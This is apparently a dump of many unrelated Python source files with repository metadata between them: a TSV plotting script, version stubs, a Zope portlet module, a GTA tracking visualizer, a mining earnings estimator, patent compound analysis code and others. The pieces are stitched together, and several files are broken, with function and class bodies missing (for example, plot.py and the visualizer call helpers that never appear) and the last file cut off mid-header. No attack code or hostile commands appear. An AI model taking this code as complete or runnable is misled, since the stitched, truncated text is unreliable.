] | null | null | null | src/test/py/ltprg/results/plot.py | forkunited/ltprg | 4e40d3571d229023df0f845c68643024e04bc202 | [
"MIT"
] | 1 | 2021-02-04T12:43:37.000Z | 2021-02-04T12:43:37.000Z | #!/usr/bin/python
#
# Usage: plot.py [input_file] [xlabel] [ylabel] [x] [y] [where] [where_values] [groupby]
#
# input_file: Input tsv file where the first row contains column names
# xlabel: Label for plot horizontal axis
# ylabel: Label for plot vertical axis
# x: Name of column to plot on horizontal axis
# y: Name of column to plot on vertical axis
# where: Comma-separated list of columns for which to constrain the values contained in the plot
# where_values: Comma-separated list of values by which to constrain the columns given in [where]
# groupby: Comma-separated list of columns on which to group the data into separate curves
#
# The script will generate a 2-dimensional plot containing a set of curves. Values are averaged
# across rows of data that fit the constraints given in [where] and [where_values]. The averages
# are computed for separate curves determined by the [groupby]
#
import csv
import sys
import numpy as np
from scipy import stats
from random import randint
# Positional CLI arguments (see the usage comment at the top of file).
input_file = sys.argv[1]
xlabel = sys.argv[2]
ylabel = sys.argv[3]
x = sys.argv[4]
y = sys.argv[5]
# Optional row filter: comma-separated column names and, in the next
# argument, the values those columns must match.  'None' disables it.
where = None
where_values = None
if len(sys.argv) > 6 and sys.argv[6] != 'None' and sys.argv[7] != 'None':
    where = sys.argv[6].split(",")
    where_values = sys.argv[7].split(",")
# Optional grouping columns: one curve per distinct group value.
groupby = None
if len(sys.argv) > 8:
    groupby = sys.argv[8].split(",")
# When the 9th argument is the literal string "True", emit a table
# instead of a LaTeX plot.
make_table = False
if len(sys.argv) > 9:
    make_table = (sys.argv[9] == "True")
# Map [groupby],x -> y value list filtered by 'where'.
# (read_tsv_file/aggregate/compute_statistics and the two renderers
# below are defined elsewhere in this script.)
rows = read_tsv_file(input_file)
agg = aggregate(rows, x, y, where, where_values, groupby)
statistics, overall_statistics = compute_statistics(agg, groupby)
if make_table:
    print(make_aggregate_table(statistics, overall_statistics, xlabel, ylabel, groupby))
else:
    print(make_latex_plot(statistics, overall_statistics, xlabel, ylabel, groupby))
| 33.804545 | 202 | 0.600376 |
b0cb8d6fd396de4dcda21996632c248c8e21dab4 | 320 | py | Python | version.py | ERICMIAO0817/knlp | 56052e49be87d604839d8f81a7295c73a5ac62cf | [
"MIT"
] | 19 | 2021-03-17T02:15:18.000Z | 2021-12-14T04:46:21.000Z | version.py | ERICMIAO0817/knlp | 56052e49be87d604839d8f81a7295c73a5ac62cf | [
"MIT"
] | 4 | 2022-03-08T16:28:18.000Z | 2022-03-28T15:11:11.000Z | version.py | ERICMIAO0817/knlp | 56052e49be87d604839d8f81a7295c73a5ac62cf | [
"MIT"
] | 7 | 2021-03-17T02:15:23.000Z | 2022-03-17T15:41:04.000Z | #!/usr/bin/python
# -*- coding:UTF-8 -*-
# -----------------------------------------------------------------------#
# File Name: version.py
# Author: Junyi Li
# Mail: 4ljy@163.com
# Created Time: 2021-01-27
# Description:
# -----------------------------------------------------------------------#
__version__ = "0.2.2"
| 26.666667 | 74 | 0.34375 |
b0ccf531cfab6c9c4a503a8b46e7c6adcacdc203 | 1,336 | py | Python | tests/base.py | abdghani995/docker-falcon | 6e552a23c3dcc7210083cbe049a7ffbd13a888b1 | [
"MIT"
] | 19 | 2019-12-14T20:21:03.000Z | 2021-08-11T07:38:42.000Z | tests/base.py | abdghani995/docker-falcon | 6e552a23c3dcc7210083cbe049a7ffbd13a888b1 | [
"MIT"
] | 2 | 2018-05-14T23:05:11.000Z | 2021-11-21T19:32:08.000Z | tests/base.py | vvitsenets/VICTORIA | 843ad6cc1ecec8b0fb424263de37691454cd2b4e | [
"MIT"
] | 4 | 2019-12-15T05:59:57.000Z | 2022-03-05T08:03:04.000Z | import unittest
import falcon
import falcon.testing
import app.util.json as json
from app import create_app
| 29.688889 | 66 | 0.627246 |
b0cef7efc960a0a20a9e808c895f9ff5b72321b6 | 1,903 | py | Python | src/zojax/portlet/browser/portlets.py | Zojax/zojax.portlet | f442ae53c400cd39e0c593138b83eeea0d13787e | [
"ZPL-2.1"
] | null | null | null | src/zojax/portlet/browser/portlets.py | Zojax/zojax.portlet | f442ae53c400cd39e0c593138b83eeea0d13787e | [
"ZPL-2.1"
] | null | null | null | src/zojax/portlet/browser/portlets.py | Zojax/zojax.portlet | f442ae53c400cd39e0c593138b83eeea0d13787e | [
"ZPL-2.1"
] | null | null | null | ##############################################################################
#
# Copyright (c) 2009 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""
$Id$
"""
from zope import interface
from zope.location import LocationProxy
from zope.publisher.interfaces import NotFound
from zope.publisher.interfaces import IPublishTraverse
from zope.security.proxy import removeSecurityProxy
from zope.component import getAdapters, queryMultiAdapter
from zojax.statusmessage.interfaces import IStatusMessage
from zojax.portlet.interfaces import IPortletManager, IPortletsExtension
from zojax.portlet.browser.interfaces import IPortletManagerPublicMarker
| 33.982143 | 78 | 0.683132 |
b0d04d598a11b7e88dbf9f7dcbe48c016cf93d7f | 2,280 | py | Python | recsystem/embedder/post_embed.py | DOREMUS-ANR/recommender | 027e0dcb3639f03204c67777e2e10aac8505a70a | [
"MIT"
] | 2 | 2017-03-28T15:48:18.000Z | 2018-09-06T08:50:34.000Z | recsystem/embedder/post_embed.py | DOREMUS-ANR/recommender | 027e0dcb3639f03204c67777e2e10aac8505a70a | [
"MIT"
] | null | null | null | recsystem/embedder/post_embed.py | DOREMUS-ANR/recommender | 027e0dcb3639f03204c67777e2e10aac8505a70a | [
"MIT"
] | null | null | null | import os
import codecs
from shutil import copyfile
from gensim.models import KeyedVectors
from SPARQLWrapper import SPARQLWrapper, JSON
| 31.232877 | 117 | 0.658333 |
b0d08b7dcc6e66d8aad9485ee7da2eca8c60ae84 | 188 | py | Python | raster/__init__.py | manfre-lorson/MacPyver | 62503dae69705a25202f24615e0c7cc88e10d753 | [
"Apache-2.0"
] | 1 | 2021-11-03T01:49:47.000Z | 2021-11-03T01:49:47.000Z | raster/__init__.py | manfre-lorson/MacPyver | 62503dae69705a25202f24615e0c7cc88e10d753 | [
"Apache-2.0"
] | null | null | null | raster/__init__.py | manfre-lorson/MacPyver | 62503dae69705a25202f24615e0c7cc88e10d753 | [
"Apache-2.0"
] | 1 | 2018-07-11T09:23:45.000Z | 2018-07-11T09:23:45.000Z |
# Import optional raster backends, reporting whether each is available.
# Only ImportError is swallowed so that genuine errors inside a backend
# still propagate instead of being silently reported as "no support".
try:
    from . import tiff
    print("full tiff support")
except ImportError:
    print("no tiff support")
try:
    # Relative import for consistency with `tiff` above; a bare
    # `import hdf5` only resolved a sibling module under Python 2's
    # implicit relative imports and fails on Python 3.
    from . import hdf5
    print("full hdf5 support")
except ImportError:
    print("no hdf5 support")
| 13.428571 | 30 | 0.62766 |
b0d2ea6ce566b3bde93b03ec4fb9ce3e2422e739 | 6,292 | py | Python | clustering/track_visualization.py | XiaoSanGit/wda_tracker | b68ec0edb9daa6cc495815ba9ca549b36eec0369 | [
"MIT"
] | 24 | 2020-06-23T11:17:42.000Z | 2022-03-29T00:38:09.000Z | clustering/track_visualization.py | XiaoSanGit/wda_tracker | b68ec0edb9daa6cc495815ba9ca549b36eec0369 | [
"MIT"
] | 13 | 2020-07-07T03:59:02.000Z | 2022-03-30T04:28:06.000Z | clustering/track_visualization.py | XiaoSanGit/wda_tracker | b68ec0edb9daa6cc495815ba9ca549b36eec0369 | [
"MIT"
] | 9 | 2021-02-14T07:11:05.000Z | 2021-12-23T12:47:08.000Z |
import os
from tqdm import tqdm
import pandas as pd
from utilities.helper import get_bbox_middle_pos,drawBoundingBox
from clustering.clustering_utils import get_person_id_to_track,get_groundtruth_person_id_to_track
import cv2
from utilities.helper import *
from utilities.pandas_loader import load_csv
if __name__ == "__main__":
    # Build a visualizer against local (laptop) paths.
    # NOTE(review): this first instance is immediately overwritten by the
    # second assignment below and is never used -- confirm it is dead code.
    trv = Track_Visualization(dataset_base_folder="/home/philipp/Downloads/Recording_12.07.2019"
                              ,track_results_path="/home/philipp/work_dirs/clustering/single_camera_refinement/track_results_2.txt"
                              ,track_evaluation_results_path="/home/philipp/work_dirs/clustering/evaluation_per_track_results.csv"
                              ,work_dirs="/home/philipp/work_dirs"
                              ,cam_id=2)
    # Effective configuration: server/network-storage paths for camera 2,
    # with drawn tracks written to `output_folder`.
    trv = Track_Visualization(dataset_base_folder="/net/merkur/storage/deeplearning/users/koehl/gta/Recording_12.07.2019_17"
                              ,
                              track_results_path="/home/koehlp/Downloads/work_dirs/clustering/single_camera_refinement/track_results_2.txt"
                              ,
                              track_evaluation_results_path="/home/koehlp/Downloads/work_dirs/clustering/evaluation_per_track_results.csv"
                              , work_dirs="/home/koehlp/Downloads/work_dirs"
                              , cam_id=2
                              , output_folder="/net/merkur/storage/deeplearning/users/koehl/gta/drawn_tracks_matched")
    trv.run_visualization()
| 33.827957 | 139 | 0.665607 |
b0d30d1f5e1fa7c7ff3fa8d3f5343770ef436fc7 | 445 | py | Python | Src/ZenCoding/zencoding/coda.py | JetBrains/ReSharperPowerToys | 352d61acba98d71b4c7a63a1def9fe550b7a0e57 | [
"Apache-2.0"
] | 18 | 2015-01-22T18:18:17.000Z | 2021-11-08T09:49:53.000Z | Src/ZenCoding/zencoding/coda.py | JetBrains/ReSharperPowerToys | 352d61acba98d71b4c7a63a1def9fe550b7a0e57 | [
"Apache-2.0"
] | null | null | null | Src/ZenCoding/zencoding/coda.py | JetBrains/ReSharperPowerToys | 352d61acba98d71b4c7a63a1def9fe550b7a0e57 | [
"Apache-2.0"
] | 8 | 2015-05-15T19:34:04.000Z | 2022-03-19T07:00:15.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Coda plug-in
Created on Apr 20, 2009
@author: sergey
'''
import os
from zencoding import zen_core
from zencoding.settings import zen_settings
zen_core.newline = os.getenv('CODA_LINE_ENDING', zen_core.newline)
zen_core.insertion_point = '$$IP$$'
cur_line = 'hello world div>p'
cur_index = 17
abbr = zen_core.find_abbr_in_line(cur_line, cur_index)
if abbr:
print(zen_core.expand_abbr(abbr))
| 19.347826 | 66 | 0.74382 |
b0d43b5a5e1054b6e91b5c04e0aefe730f1c03da | 958 | py | Python | Scripts/simulation/world/rentable_lot_tuning.py | velocist/TS4CheatsInfo | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | [
"Apache-2.0"
] | null | null | null | Scripts/simulation/world/rentable_lot_tuning.py | velocist/TS4CheatsInfo | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | [
"Apache-2.0"
] | null | null | null | Scripts/simulation/world/rentable_lot_tuning.py | velocist/TS4CheatsInfo | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | [
"Apache-2.0"
] | null | null | null | # uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]
# Embedded file name: T:\InGame\Gameplay\Scripts\Server\world\rentable_lot_tuning.py
# Compiled at: 2014-09-09 00:07:16
# Size of source mod 2**32: 925 bytes
from sims4.tuning.tunable import TunableTuple, Tunable
from sims4.tuning.tunable_base import ExportModes | 50.421053 | 116 | 0.685804 |
b0d58a0cf4141bba29b28d7f0ec53b0cea18f50b | 7,099 | py | Python | grin-py/utils/MWGP_earningsEstimate.py | JPaulMora/grin-pool | c980fdbcae4edeaa661d36d5b6da6f7a49beed05 | [
"Apache-2.0"
] | null | null | null | grin-py/utils/MWGP_earningsEstimate.py | JPaulMora/grin-pool | c980fdbcae4edeaa661d36d5b6da6f7a49beed05 | [
"Apache-2.0"
] | null | null | null | grin-py/utils/MWGP_earningsEstimate.py | JPaulMora/grin-pool | c980fdbcae4edeaa661d36d5b6da6f7a49beed05 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python3
# Copyright 2018 Blade M. Doyle
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------
###
# Estmate MWGrinPool earnings from historic data
# Input: --days, --c29gps, --c31gps
# Algorithm:
# Get a list of the blocks found by MWGrinPool within the requested block range
# For each pool-found-block:
# Calculate the theoritical rewards for a user with provided GPS
# Generate a graph
import os
import sys
import argparse
from datetime import datetime, timedelta
try:
import requests
except Exception as e:
print("Error: This script requires the 'requests' module, please run `pip3 install requests`")
Graph = True
try:
import plotly
import plotly.graph_objs as go
except Exception as e:
Graph = False
mwURL = "https://api.mwgrinpool.com"
NanoGrin = 1.0/1000000000.0
SecondsInDay = float(60*60*24)
PPLNGSeconds = float(60*60*4)
parser = argparse.ArgumentParser()
parser.add_argument("--days", help="Number of days to average over")
parser.add_argument("--c29gps", help="Miners C29 Graphs/second")
parser.add_argument("--c31gps", help="Miners C31 Graphs/second")
parser.add_argument("--debug", help="Print lots of debug info")
args = parser.parse_args()
print_header()
if args.days is None:
NumDays = float(input(" Number of days to average over: "))
else:
NumDays = float(args.days)
if NumDays > 62:
print(" ")
print(" -- Error: Please limit your query to 60 days to prevent excess load on our pool API")
print(" ")
sys.exit(1)
if args.c29gps is None:
C29Gps = float(input(" Miners C29 Graphs/second: "))
else:
C29Gps = float(args.c29gps)
if args.c31gps is None:
C31Gps = float(input(" Miners C31 Graphs/second: "))
else:
C31Gps = float(args.c31gps)
if args.debug is None:
debug = False
EndTS = datetime.now()
startTS = EndTS - timedelta(days=NumDays)
# Get a list of the pool-found-blocks within the range
poolblocksURL = mwURL + "/pool/blocks/0,1440/timestamp,height"
poolblocksJSON = requests.get(url = poolblocksURL).json()
poolblocks = [block['height'] for block in poolblocksJSON if(block['timestamp'] >= startTS.timestamp() and block['timestamp'] <= EndTS.timestamp())]
poolblocks.sort()
debug and print("Pool Blocks found in range: {}".format(poolblocks))
print(" ")
print(" Getting Mining Data: ")
rewardTotal = 0
x = [startTS]
y = [0]
debug and print("Start Time: {} - {}".format(startTS, startTS.timestamp()))
debug and print("End Time: {} - {}".format(EndTS, EndTS.timestamp()))
debug or sys.stdout.write(" ")
sys.stdout.flush()
for blockHeight in poolblocks:
# For each pool block, get some information:
# Secondary Scale Value
# Any TX fees included in the block reward
grinBlockURL = mwURL + "/grin/block/{}/timestamp,height,secondary_scaling,fee".format(blockHeight)
grinblockJSON = requests.get(url = grinBlockURL).json()
# Pool GPS at that block height
poolGpsURL = mwURL + "/pool/stat/{}/gps".format(blockHeight)
poolGpsJSON = requests.get(url = poolGpsURL).json()
# Calculate theoretical miners reward
scale = (2**(1+31-24)*31)/float(max(29, grinblockJSON['secondary_scaling']))
minerValue = C29Gps + C31Gps*scale
poolValue = 0
for gps in poolGpsJSON['gps']:
if gps['edge_bits'] == 29:
poolValue += gps['gps']
else:
poolValue += gps['gps']*scale
debug and print("Miner value: {}, pool value: {}".format(minerValue, poolValue))
fullMinersReward = (minerValue/poolValue)*(60+grinblockJSON['fee']*NanoGrin)
tsNow = datetime.fromtimestamp(grinblockJSON['timestamp'])
timedelta = tsNow - startTS
# Check if we get the full reward or not
if(timedelta.total_seconds() < PPLNGSeconds):
minersReward = fullMinersReward * (timedelta.total_seconds()/PPLNGSeconds)
else:
minersReward = fullMinersReward
debug and print(" + Miners reward for {} block {}: {}".format(datetime.fromtimestamp(grinblockJSON['timestamp']).strftime('%c'), blockHeight, minersReward))
rewardTotal += minersReward
# Graph
x.append(tsNow)
timedelta = tsNow - startTS
debug and print("timedelta = {}".format(timedelta))
daysSinceStartTS = float(timedelta.total_seconds())/float(SecondsInDay)
debug and print("daysSinceStartTS = {}".format(daysSinceStartTS))
y.append(rewardTotal/daysSinceStartTS)
debug and print(" ")
debug or sys.stdout.write(".")
sys.stdout.flush()
x.append(EndTS)
y.append(rewardTotal/NumDays)
print_footer(rewardTotal, C29Gps, C31Gps, NumDays, startTS, EndTS)
if Graph == True:
print("Generating graph...")
graphName = "Avg Daily Reward: {} Grin".format(round(rewardTotal/NumDays, 2))
graphData = [go.Scatter(x=x, y=y, name=graphName)]
graphLayout = go.Layout(
title=go.layout.Title(text=graphName),
xaxis=go.layout.XAxis(
title=go.layout.xaxis.Title(
text='Time',
font=dict(
family='Courier New, monospace',
size=18,
color='#008000'
)
)
),
yaxis=go.layout.YAxis(
title=go.layout.yaxis.Title(
text='Grin',
font=dict(
family='Courier New, monospace',
size=18,
color='#008000'
)
)
),
)
graphFigure = go.Figure(data=graphData, layout=graphLayout)
graph_name = "estimate-{}days.html".format(NumDays)
plotly.offline.plot(graphFigure, filename=graph_name)
| 35.318408 | 162 | 0.646993 |
b0d7ebc0b913cd1eef91933fd5bfa8848faaf124 | 10,700 | py | Python | cpd_analysis.py | jfmalloy1/Patents | 734e62497acfbd9be42980b310379979415ab924 | [
"MIT"
] | null | null | null | cpd_analysis.py | jfmalloy1/Patents | 734e62497acfbd9be42980b310379979415ab924 | [
"MIT"
] | null | null | null | cpd_analysis.py | jfmalloy1/Patents | 734e62497acfbd9be42980b310379979415ab924 | [
"MIT"
] | null | null | null | # import igraph as ig
# import numpy as np
import pickle
import pandas as pd
from tqdm import tqdm
import os
import heapq
import scipy.stats as stats
from random import sample
def build_cpd_df(fp):
    """Combine the separate SureChemBL compound data files into one dataframe.

    Every ``*.txt`` file in *fp* is read as a tab-separated table; the tables
    are concatenated, printed, and pickled next to the inputs as
    ``SureChemBL_allCpds.p``.

    Args:
        fp (string): Filepath to SureChemBL data files (assuming G drive goes to jmalloy3 Google Account)

    Returns:
        None - but does write a pickled dataframe to SureChemBL_Patents/Cpd_Data/ directory
    """
    # Read each tab-separated compound table found in the directory.
    frames = [
        pd.read_csv(fp + name, sep="\t", header=0)
        for name in tqdm(os.listdir(fp))
        if name.endswith(".txt")
    ]

    combined = pd.concat(frames, ignore_index=True)
    print(combined)

    # Persist the merged table alongside the inputs.
    pickle.dump(combined, file=open(fp + "SureChemBL_allCpds.p", "wb"))

    del combined
def find_highest_degrees(df, n, start, stop):
    """ Finds the n highest-degree compounds within a specific date range
    Saves various data associated with those n comopunds - smiles, inchi,
    inchikey, degree, preferential attachment value
    Args:
        df (pandas dataframe): dataframe containing all SureChemBL compounds
        n (int): the number of highest-degree compounds to select
        start (int): 1st year of the range
        stop (int): last year of the range
    """
    print("----------", start, stop, "----------")
    #Finding the top 10 preferential attachment compounds (from 1980-1984 as a test)
    # Load the per-compound degree history and preferential-attachment scores
    # precomputed for this year range (hard-coded Google Drive share paths).
    full_id_degrees = pickle.load(file=open(
        "G:\\Shared drives\\SureChemBL_Patents\\Degrees\\full_id_degrees_" +
        str(start) + "_" + str(stop) + ".p", "rb"))
    pref_attach_dict = pickle.load(file=open(
        "G:\\Shared drives\\SureChemBL_Patents\\pref_attach_dict_" +
        str(start) + "_" + str(stop) + ".p", "rb"))
    #Find n compounds with largest degree
    # heapq.nlargest keyed on the degree mapping avoids sorting the whole dict.
    highest_degree_cpds = heapq.nlargest(n,
                                         full_id_degrees,
                                         key=full_id_degrees.get)
    # Restrict the master compound dataframe to the selected IDs.
    highest_degree_cpds_df = df[df["SureChEMBL_ID"].isin(highest_degree_cpds)]
    pref_attach_values = list(pref_attach_dict.values())
    #Extra information to be added to the csv output file
    degrees = []
    pref_attach_highestCpd_values = []
    pref_attach_percentiles = []
    for cpd in tqdm(highest_degree_cpds_df["SureChEMBL_ID"]):
        #Degree of compound
        # NOTE(review): [-1] takes the last entry of the degree history --
        # presumably the degree at the end of the range; confirm.
        degrees.append(full_id_degrees[cpd][-1])
        #Preferential attachment value
        pref_attach_highestCpd_values.append(pref_attach_dict[cpd])
        #Percentile of preferential attachment value
        pref_attach_percentiles.append(
            stats.percentileofscore(pref_attach_values, pref_attach_dict[cpd]))
    # NOTE(review): assigning new columns to a filtered slice of `df` can
    # trigger pandas' SettingWithCopyWarning; a .copy() above would avoid it.
    highest_degree_cpds_df["degree"] = degrees
    highest_degree_cpds_df["pref_attach_value"] = pref_attach_highestCpd_values
    highest_degree_cpds_df["pref_attach_percentile"] = pref_attach_percentiles
    highest_degree_cpds_df.to_csv(
        "G:\\Shared drives\\SureChemBL_Patents\\Cpd_Data/highest_degree_data_" +
        str(start) + "_" + str(stop) + "_1000.csv")
    print()
def find_llanos_cpds(fp, df):
    """ Tests various compounds found in Llanos et al (2019) in SureChemBL data
    Llanos et al used Reaxys data to find the most popular compounds. This checks
    where those compounds appear, if at all, in SureChembL patent data
    Args:
        fp (string): directory the output csv ("llanos_cpds.csv") is appended to
        df (pandas dataframe): dataframe of all SureChemBL chemistry
    """
    # Reference compounds from Llanos et al. (2019), keyed by common name;
    # entries marked "(2000)" are from the paper's post-2000 popularity list.
    cpds_1980_2015_inchi = {
        "acetic anhydride":
            "InChI=1S/C4H6O3/c1-3(5)7-4(2)6/h1-2H3",
        "methanol":
            "InChI=1S/CH4O/c1-2/h2H,1H3",
        "methyl iodide":
            "InChI=1S/CH3I/c1-2/h1H3",
        "diazomethane":
            "InChI=1S/CH2N2/c1-3-2/h1H2",
        "formaldehyde":
            "InChI=1S/CH2O/c1-2/h1H2",
        "benzaldehyde":
            "InChI=1S/C7H6O/c8-6-7-4-2-1-3-5-7/h1-6H",
        "copper(II) oxide":
            "InChI=1S/Cu.O",
        "ethanol":
            "InChI=1S/C2H6O/c1-2-3/h3H,2H2,1H3",
        "benzoyl chloride":
            "InChI=1S/C7H5ClO/c8-7(9)6-4-2-1-3-5-6/h1-5H",
        "carbon monoxide":
            "InChI=1S/CO/c1-2",
        "water (2000)":
            "InChI=1S/H2O/h1H2",
        "Trifluoroacetic acid (2000)":
            "InChI=1S/C2HF3O2/c3-2(4,5)1(6)7/h(H,6,7)",
        "Phenylacetylene (2000)":
            "InChI=1S/C8H6/c1-2-8-6-4-3-5-7-8/h1,3-7H",
        "benzyl bromide (2000)":
            "InChI=1S/C7H7Br/c8-6-7-4-2-1-3-5-7/h1-5H,6H2"
    }
    #Find stats for Llanos compounds - use 2015 data for stats (I really need to make a consensus graph)
    # Degree history and preferential-attachment scores from the 2015-2019 snapshot.
    full_id_degrees = pickle.load(file=open(
        "G:\\Shared drives\\SureChemBL_Patents\\Degrees\\full_id_degrees_2015_2019.p",
        "rb"))
    pref_attach_dict = pickle.load(file=open(
        "G:\\Shared drives\\SureChemBL_Patents\\pref_attach_dict_2015_2019.p",
        "rb"))
    pref_attach_values = list(pref_attach_dict.values())
    #Loop through Llanos compounds
    # NOTE(review): the csv is opened in append mode, so re-running the
    # function duplicates the header row.
    with open(fp + "llanos_cpds.csv", "a") as f:
        f.write(
            "name,inchi,SureChemBL_ID,degree,pref_attach_value,pref_attach_percentile\n"
        )
        for name, inchi in cpds_1980_2015_inchi.items():
            s = df[df["InChI"] == inchi]
            if not s.empty: #if SureChemBL holds that compound, save id & stats
                #Degree of compound
                degree = full_id_degrees[s.iloc[0]["SureChEMBL_ID"]][-1]
                #Preferential attachment value
                pref_attach_value = pref_attach_dict[s.iloc[0]["SureChEMBL_ID"]]
                #Percentile of preferential attachment value
                pref_attach_percentile = stats.percentileofscore(
                    pref_attach_values,
                    pref_attach_dict[s.iloc[0]["SureChEMBL_ID"]])
                f.write(name + ",\"" + inchi + "\"," +
                        s.iloc[0]["SureChEMBL_ID"] + "," + str(degree) + "," +
                        str(pref_attach_value) + "," +
                        str(pref_attach_percentile) + "\n")
            else: #if not, no name nor stats
                f.write(name + ",\"" + inchi + "\",na,na,na,na\n")
def build_month_increments(start, stop):
    """ Build all monthly increments from the start year to stop year in the
    format YEAR-MONTH
    Args:
        start (int): start year of increments
        stop (int): end year of increments
    Returns:
        list: list of strings holding the YEAR-MONTH increments
    """
    # Twelve zero-padded "YYYY-MM" labels per year, in ascending order.
    # An empty list is returned when start > stop, matching the loop form.
    return [
        f"{year}-{month:02d}"
        for year in range(start, stop + 1)
        for month in range(1, 13)
    ]
def sample_compounds_unique(n, months, cpds, cpd_df):
    """ Sample compounds which are uniquely added in a specific month
    This uniquess is determined by determing when a compound is added in a month
    and has not been present in the patent record before that month.
    Args:
        n (int): Number of compounds to sample every month
        months (list): list of months to sample from
        cpds (list): all SureChemBL IDs of compounds added in a specific month
        cpd_df (pandas dataframe): Master dataframe of all compounds
    """
    # `cpds` is indexed from 1962, while `months` starts in 1980:
    # 18 years * 12 months = 216 entries to skip.
    month_offset = 216

    inchi_by_month = {}
    print("----- Sampling unique compounds -----")
    for index in tqdm(range(len(months))):
        monthly_ids = cpds[index + month_offset]
        # Down-sample only when the month holds more than n compounds;
        # otherwise keep everything that month added.
        chosen = sample(monthly_ids, n) if len(monthly_ids) > n else monthly_ids
        matches = cpd_df[cpd_df["SureChEMBL_ID"].isin(chosen)]
        inchi_by_month[months[index]] = list(matches["InChI"])

    print("\n----- Saving compounds -----")
    pickle.dump(inchi_by_month, file=open("Data/sample_inchi_1000_NEW.p", "wb"))
def sample_compounds(n1, n2, months, cpd_df):
    """ Sample n1 and n2 compounds from each month, initially with overlap allowed
    //TODO: fix so that only unique-to-that-month compounds are sampled
    Args:
        n1 (int): number of compounds to sample per month
        n2 (int): another number of compounds to sample per month
        months (list): month descriptions, e.g. "1980-01"
        cpd_df (pandas dataframe): contains information for each compound in SureChemBL, including InChIKey
    Returns:
        None - writes the sampled InChIs, keyed by month, to two pickle files under Data/
    """
    #Inchis for all sampled compounds
    sample_inchis_n1 = {}
    sample_inchis_n2 = {}
    print("----- Sampling Compounds ------\n")
    for month in tqdm(months):
        # Compounds first added to the patent record in this month.
        cpds = pickle.load(file=open(
            "G:\\Shared drives\\SureChemBL_Patents\\CpdPatentIdsDates\\unique_cpds_"
            + month + ".p", "rb"))
        sample_cpds_n1 = sample(cpds, n1)
        sample_cpds_n2 = sample(cpds, n2)
        sub_df = cpd_df[cpd_df["SureChEMBL_ID"].isin(sample_cpds_n1)]
        sample_inchis_n1[month] = list(sub_df["InChI"])
        sub_df = cpd_df[cpd_df["SureChEMBL_ID"].isin(sample_cpds_n2)]
        sample_inchis_n2[month] = list(sub_df["InChI"])
        # Free the month's compound list before loading the next one.
        # BUG FIX: the original also executed `del (cpd_df)` here, which
        # removed the dataframe after the first month and made every later
        # iteration fail with an UnboundLocalError.
        del cpds
    #Save sampled inchis to pickle files
    print("\n----- Saving Data -----")
    pickle.dump(sample_inchis_n1, file=open("Data/sample_inchi_100.p", "wb"))
    pickle.dump(sample_inchis_n2, file=open("Data/sample_inchi_1000.p", "wb"))
if __name__ == "__main__":
main()
| 36.148649 | 113 | 0.622056 |
b0d95d877dbc18f3a49976b9ba5deae89d43a171 | 350 | py | Python | finished/python_principles/05_type_check.py | UltiRequiem/daily-python-practice | 31f72c45378be90b8fcadd30d7042819ee551a17 | [
"MIT"
] | 8 | 2021-05-29T23:30:12.000Z | 2021-09-24T03:25:44.000Z | finished/python_principles/05_type_check.py | UltiRequiem/daily-python-practice | 31f72c45378be90b8fcadd30d7042819ee551a17 | [
"MIT"
] | null | null | null | finished/python_principles/05_type_check.py | UltiRequiem/daily-python-practice | 31f72c45378be90b8fcadd30d7042819ee551a17 | [
"MIT"
] | 6 | 2021-06-02T14:20:24.000Z | 2021-08-19T00:49:26.000Z | """
Your function should return True if both parameters are integers, and False otherwise.
"""
if __name__ == "__main__":
tests()
| 18.421053 | 86 | 0.62 |
b0da89a6bb254fa22755c06a1a618c46fe33ed81 | 3,775 | py | Python | media/limited_series.py | FellowHashbrown/MediaQueue | 0844649709698c66b7ed14e70436b3830ab18627 | [
"MIT"
] | null | null | null | media/limited_series.py | FellowHashbrown/MediaQueue | 0844649709698c66b7ed14e70436b3830ab18627 | [
"MIT"
] | null | null | null | media/limited_series.py | FellowHashbrown/MediaQueue | 0844649709698c66b7ed14e70436b3830ab18627 | [
"MIT"
] | null | null | null | import os
from json import dump
from typing import List
from media import Episode, Show
from options import options
| 45.481928 | 125 | 0.625166 |
b0daa63a5af9ec548e408e77f43dd85ab4843906 | 462 | py | Python | __findModuleLocations.py | simdevex/01.Basics | cf4f372384e66f4b26e4887d2f5d815a1f8e929c | [
"MIT"
] | null | null | null | __findModuleLocations.py | simdevex/01.Basics | cf4f372384e66f4b26e4887d2f5d815a1f8e929c | [
"MIT"
] | null | null | null | __findModuleLocations.py | simdevex/01.Basics | cf4f372384e66f4b26e4887d2f5d815a1f8e929c | [
"MIT"
] | null | null | null | '''
Python program to find the location of Python modulesources
'''
#Location of Python module sources:
import imp
print("Location of Python os module sources:")
print(imp.find_module('os'))
print("\nLocation of Python sys module sources:")
print(imp.find_module('datetime'))
#List of directories of specific module:
import os
print("\nList of directories in os module:")
print(os.path)
print("\nList of directories in sys module:")
import sys
print(sys.path)
| 24.315789 | 59 | 0.75974 |
b0dc67e2fb068fd1e2da407f360e7696247d97ff | 8,104 | py | Python | api.py | gitroulette/gitroulette | 0c53cdf843b202efa7d0e7a3fcbcb0a7bc7f0b0b | [
"Apache-2.0"
] | null | null | null | api.py | gitroulette/gitroulette | 0c53cdf843b202efa7d0e7a3fcbcb0a7bc7f0b0b | [
"Apache-2.0"
] | null | null | null | api.py | gitroulette/gitroulette | 0c53cdf843b202efa7d0e7a3fcbcb0a7bc7f0b0b | [
